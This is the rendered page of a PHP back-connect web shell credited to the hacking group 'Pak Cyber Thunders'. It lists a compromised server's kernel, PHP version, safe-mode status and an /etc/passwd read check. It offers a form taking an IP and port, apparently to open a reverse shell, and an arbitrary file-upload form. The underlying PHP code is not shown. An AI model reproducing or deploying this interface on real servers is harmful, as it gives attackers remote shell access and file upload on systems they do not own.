<html><title>Mell Castillo Pabillar!</title><center>
<p align="center"><div style="font-family: Iceland;font-size: 50pt;text-shadow: 0 0 9px #FF0000, 0 0 9px #FF0000, 0 0 9px #FF0000;color: #FFF"><a target="_blank" href="https://www.facebook.com/PakCyberThunders">Pak Cyber Thunders</a></div></p>
<font color="grey" face="Comic Sans MS" size="20">PHP BackConnector</font></b>
<p>These Tool's Are Developed For Team Pak Cyber Thunders</p>
</center></html>

<style>
body
{
        background: #0f0e0d;
        color: #FF9933;
        padding: 0px;
}
a:link, body_alink
{
        color: #FF9933;
        text-decoration: none;
}
a:visited, body_avisited
{
        color: #FF9933;
        text-decoration: none;
}
a:hover, a:active, body_ahover
{
        color: #FFFFFF;
        text-decoration: none;
}
td, th, p, li,table
{

        background: #2e2b28;
        border:1px solid #524f46;
}
input
{
        border: 1px solid;
        cursor: default;

        overflow: hidden;
        background: #2e2b28;
        color: #ffffff;
}textarea
{
        border: 1px solid;
        cursor: default;

        overflow: hidden;
        background: #2e2b28;
        color: #ffffff;
}
button
{
        border: 1px solid;
        cursor: default;

        overflow: hidden;
        background: #2e2b28;
        color: #ffffff;
}
</style>
<title>BackConnect By Anonymous 404</title>
<center>
<b><font color=red>Disable Functions: </b></font><b><font color=green>NONE</font></b></br><b><font color=red>Uname : </b></font><b>Linux localhost 3.18.35+ #1 SMP PREEMPT Sat Oct 19 07:19:26 CST 2019 aarch64</b></br><b><font color=red>PHP Version : </b></font><b>7.3.10</b></br><b><font color=red>Server Admin : </b></font><b></b></br><b><font color=red>Server IP  :   </b></font><b> </b><b><font color=red>Your IP :  </b></font><b></b></br><b><font color=red>Safe Mode :  </font></b><font color=#008000><b>Safe Mode is OFF</b></font></br><b><font color=red>Read etc/passwd : </font></b><b><b><span style="color:red"/>Disabled </span></b></b><b><font color=red>Functions : </font><b><a href='?p=info'>PHP INFO </a></center>
<table align="center" >
         <form method="GET">
         <td>
            <table style="border-spacing: 6px;">
                <tr>
                    <td>IP</td>
                    <td>
                        <input style="width: 200px;" name="ip" value="127.0.0.1" />
                    </td>
                </tr>
                <tr>
                    <td>Port </td>
                    <td><input style="width: 100px;" name="port" size='5' value="110"/>
                </tr>
                <tr>
                <td>
                <input style="width: 90px;" class="own" type="submit" value="Submit"/>
                </td>
                </tr>

            </table>
         </td>
         </form>
    </tr>
    </table>
<center>
<br><div>

<form method="POST" action="" enctype="multipart/form-data"><input type="file" name="image"><input type="Submit" name="Submit" value="Submit"></form></div>
</center>

<p align="center" style="color: red;" >PCT Tool's Developed By Mel Castillo Pabillar <a href="https://www.facebook.com/WeAreAnonymous1010101010000100">Mell Pabillar</a>! </p>
